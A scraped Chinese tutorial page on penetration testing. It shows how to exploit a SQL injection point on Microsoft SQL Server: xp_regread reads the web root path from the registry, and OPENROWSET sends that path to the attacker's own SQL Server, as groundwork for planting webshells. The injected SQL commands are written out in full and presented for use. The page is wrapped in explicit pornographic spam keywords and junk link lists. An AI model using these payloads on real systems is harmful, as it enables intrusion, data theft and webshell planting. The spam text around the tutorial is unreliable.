好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁(yè) > 知識(shí)庫(kù) > 滲透中用openrowset搞shell的方法

滲透中用openrowset搞shell的方法

熱門(mén)標(biāo)簽:臨滄移動(dòng)外呼系統(tǒng)哪家有 寧夏保險(xiǎn)智能外呼系統(tǒng)哪家好 溫嶺代理外呼系統(tǒng) 防城港市ai電銷(xiāo)機(jī)器人 怎么更改地圖標(biāo)注電話(huà) 交行外呼系統(tǒng)有哪些 激戰(zhàn)黃昏地圖標(biāo)注說(shuō)明 不同的地圖標(biāo)注 隨州銷(xiāo)售外呼系統(tǒng)平臺(tái)
滲透中用openrowset搞shell的方法 
得到SQL注入點(diǎn),首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發(fā)現(xiàn)屏蔽了SQL錯(cuò)誤信息,得不到物理路徑,那還寫(xiě)個(gè)PP馬了.
聯(lián)想到一個(gè)權(quán)限不是很高的命令openrowset,進(jìn)行跨庫(kù)服務(wù)器查詢(xún),就是把一個(gè)SQL命令發(fā)送到遠(yuǎn)程數(shù)據(jù)庫(kù),然后看返回的結(jié)果,但是要啟動(dòng)事件跟蹤!我們可以把網(wǎng)站信息寫(xiě)入數(shù)據(jù)庫(kù),然后%$^%$@#$@^%$~
首先在自己機(jī)器建立SQL數(shù)據(jù)庫(kù) 

然后在對(duì)方機(jī)器上建立個(gè)表 create table [dbo].[fenggou]([cha8][char](255))--

在對(duì)方執(zhí)行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個(gè)表里就會(huì)有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說(shuō),''D:\WEB"就是從注冊(cè)表里讀出的物理路徑拉.然后執(zhí)行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于執(zhí)行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時(shí)你在你機(jī)器上SQL事件追蹤器上就會(huì)顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路徑到手了 寫(xiě)小馬傳大馬吧~ 

標(biāo)簽:紅河 阜陽(yáng) 哈密 忻州 無(wú)錫 青海 河源 沈陽(yáng)

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《滲透中用openrowset搞shell的方法》,本文關(guān)鍵詞  滲透,中用,openrowset,搞,shell,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《滲透中用openrowset搞shell的方法》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于滲透中用openrowset搞shell的方法的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    主站蜘蛛池模板: 国产免费无码一区二区Av视频| 扒开美女疯狂桶?难受| 免费麻豆国产黄网站在线观看| 国产又粗又猛又色又黃网站| 主播视频18禁?网站| free性丰满69性欧美| 国产麻豆精品免费密入口| 福利一区在线| 欧美交换配乱淫粗大| 洗澡gay军人gay军人| 伊人久久精品一区二区三区| 免费看欧美日韩一区二区三区| 毛片软件| 国产特黄特色a级在线视| 午夜dj在线观看免费视频完整| 永久免费看黄| 作爱视频免费看| 韩国人体sua凹凸| 99爱爱| 一级做α爱全过程免费视频| 少妇高潮免费看一级A片精东影视| 欧美日韩aa一级视频| 日韩高清专区| 免费一级毛片女人图片| 欧美激情性色生活片| 我解开岳的乳罩吃她胸| 欧美派对XXXHDParty| 丁香六月色婷婷| 二女一男三p技巧| 亚洲色婷婷一区二区三区ai换脸| 好看的理论片哚哚影音先锋| 娇妻被灌满怀孕系列| 老女人三级播放在线| 男男寝室互攻h啪肉np文| 国产一区二区三区不卡在线观看| 亚洲欧美不卡中文字幕| jyzzjyzz视频免费完整版| bl高腐短篇肉男男各种play| japansexxxx| 蜜桃精品一区二区在线观看| 51无码人妻精品1国产探花|